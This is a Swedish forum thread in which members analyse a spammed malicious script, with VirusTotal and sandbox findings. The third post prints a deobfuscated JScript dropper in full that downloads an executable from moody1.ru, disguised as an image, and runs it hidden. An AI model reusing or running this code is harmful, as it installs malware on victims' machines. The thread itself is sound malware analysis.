Vinnaren i pepparkakshustävlingen!
2015-04-08, 14:59
  #1
Medlem
Hej!

Fick en intressant kodsnutt spammad till min arbetsmail.
Har ingen tidigare erfarenhet av att analysera skadlig kod, så jag vänder mig därför till er här på FB för att se vad skiten gör

Koden i orginalfilen var skriven på endast en rad. Efter några minuters fixande i SublimeText ser den ut såhär:


Någon som förstår sig på skiten? Vore intressant och se vad baktanken är. Är detta en attack mot mig/mitt företag eller ett vanligt spamm som slunkit genom mitt spammfilter.

Mvh Pixl
__________________
Senast redigerad av .pixl 2015-04-08 kl. 15:06.
Citera
2015-04-13, 17:10
  #2
Medlem
Verkar som att det laddar ner en trojan enligt VirusTotal då flera av antivirusen som detekterar filen som skadlig namnger den som sådan.

https://www.virustotal.com/en/file/4...is/1428937249/

Körde skriptet i Sandboxie och det laddades ner två filer som anslöt till Internet. Trots att själva koden flaggades som skadlig så visar antivirusen noll på filerna som laddas ner.

https://www.virustotal.com/en/file/b...is/1428937189/

https://www.virustotal.com/en/file/6...is/1428937194/
Citera
2015-05-06, 14:47
  #3
Medlem
Bulbasaurs avatar
Avobfuskerat för hand:

Kod:
(function() {
  try {
    var w = window["wbrtbr"];
  } catch (e) {
    try {
      var a = new ActiveXObject("ewrgve");
    } catch (eee) {
      function fn(fr, tmp, rn) {
        var shell = new ActiveXObject("WScript.Shell");
        var tmp = shell["ExpandEnvironmentStrings"]("%TEMP%") + '\\' + tmp;
        var http = new ActiveXObject("MSXML2.XMLHTTP");
        http["onreadystatechange"] = function() {
          if (http.readyState === 4) {
            var stream = new ActiveXObject("ADODB.Stream");
            stream.open();
            stream.type = 1;
            stream.write(http.ResponseBody);
            stream.position = 0;
            stream.saveToFile(tmp, 2);
            stream.close();
          };
        };
        try {
          http.open("GET", fr, false);
          http.send();
          if (rn > 0) {
            shell["Run"](tmp, 0, 0);
          };
        } catch (e) {};
      }
      fn("4762711.exe", 1);
      fn("http://moody1.ru/images/twowindows.jpg", "3755839.exe", 1);
    }
  };
})();

EDIT: Alltid dessa ryssar...
Citera

Stöd Flashback

Flashback finansieras genom donationer från våra medlemmar och besökare. Det är med hjälp av dig vi kan fortsätta erbjuda en fri samhällsdebatt. Tack för ditt stöd!

Stöd Flashback